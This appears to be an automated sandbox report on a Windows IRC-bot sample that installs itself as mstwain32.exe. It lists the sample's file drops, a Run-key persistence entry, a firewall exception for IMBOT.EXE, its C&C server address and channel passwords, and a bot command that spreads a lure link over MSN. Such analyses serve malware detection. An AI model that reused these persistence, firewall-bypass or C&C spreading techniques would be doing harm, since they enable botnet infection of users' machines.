HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ScriptOk"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Impersonation Level"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Repository Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Namespace"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ProcessID"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "EnablePrivateObjectHeap"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ContextLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ObjectLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "IdentifierLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system "EnableLUA"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
Enums HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType
File Changes by all processes
New Files c:\tripeks.exe
C:\WINDOWS\mstwain32.exe
C:\WINDOWS\mstwain32.exe
C:\WINDOWS\ntdtcstp.dll
C:\WINDOWS\cmsetac.dll
\Device\RasAcd
Opened Files C:\WINDOWS\Registration\R000000000007.clb
\\.\PIPE\lsarpc
C:\WINDOWS\system32\wbem\wbemdisp.TLB
\\.\PIPE\lsarpc
C:\WINDOWS\VMPipe32.dll
C:\WINDOWS\mstwain32.exe
\\.\PIPE\wkssvc
C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\Registration\R000000000007.clb
\\.\PIPE\lsarpc
C:\WINDOWS\system32\wbem\wbemdisp.TLB
\\.\PIPE\lsarpc
C:\WINDOWS\VMPipe32.dll
Deleted Files
Chronological Order Create/Open File: c:\tripeks.exe (OPEN_ALWAYS)
Find File: c:\tripeks.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\tripeks.exe to C:\WINDOWS\mstwain32.exe
Find File: C:\WINDOWS\*.*
Open File: C:\WINDOWS\mstwain32.exe (OPEN_EXISTING)
Set File Time: C:\WINDOWS\mstwain32.exe
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\mstwain32.exe
Create/Open File: C:\WINDOWS\mstwain32.exe (OPEN_ALWAYS)
Find File: C:\WINDOWS\mstwain32.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Create File: C:\WINDOWS\ntdtcstp.dll
Create File: C:\WINDOWS\cmsetac.dll
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
deli.byinter.net (turkish lamers)
deli.byinter.net 93.190.138.202
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: ryatoaj
* Nickname: [DEU|XP|516568]
* Channel: #!x!# (Password: cih4n1313)
* Channeltopic: :
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: XP-4392
* Nickname: [00|DEU|636610]
* Channel: #x# (Password: hacimackackac)
* Channeltopic: :.msn.stop|.msn.msg þu resme bi bakarmýsýn (yemekteyim) http://www.facebookbul.co.cc/images.php?=resim166-jpeg?=
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: aLeyna_yarak-istiyor
* Nickname: sevgi
* Channel: #X (Password: s1k1k)
* Channeltopic: :FFF
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\IMBOT.EXE" = C:\WINDOWS\IMBOT.EXE:*:Enabled:Windows Services
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 "win32"
HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 "AllowUnsafeObjectPassing"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography "MachineGuid"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatibility "DisableAppCompat"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56F9679E-7826-4C84-81F3-532071A8BCC5}\InprocServer32 ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File\0 "ProgID"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\file "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Mapi "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Outlookexpress "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\OTFS "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "TemplateUrl"
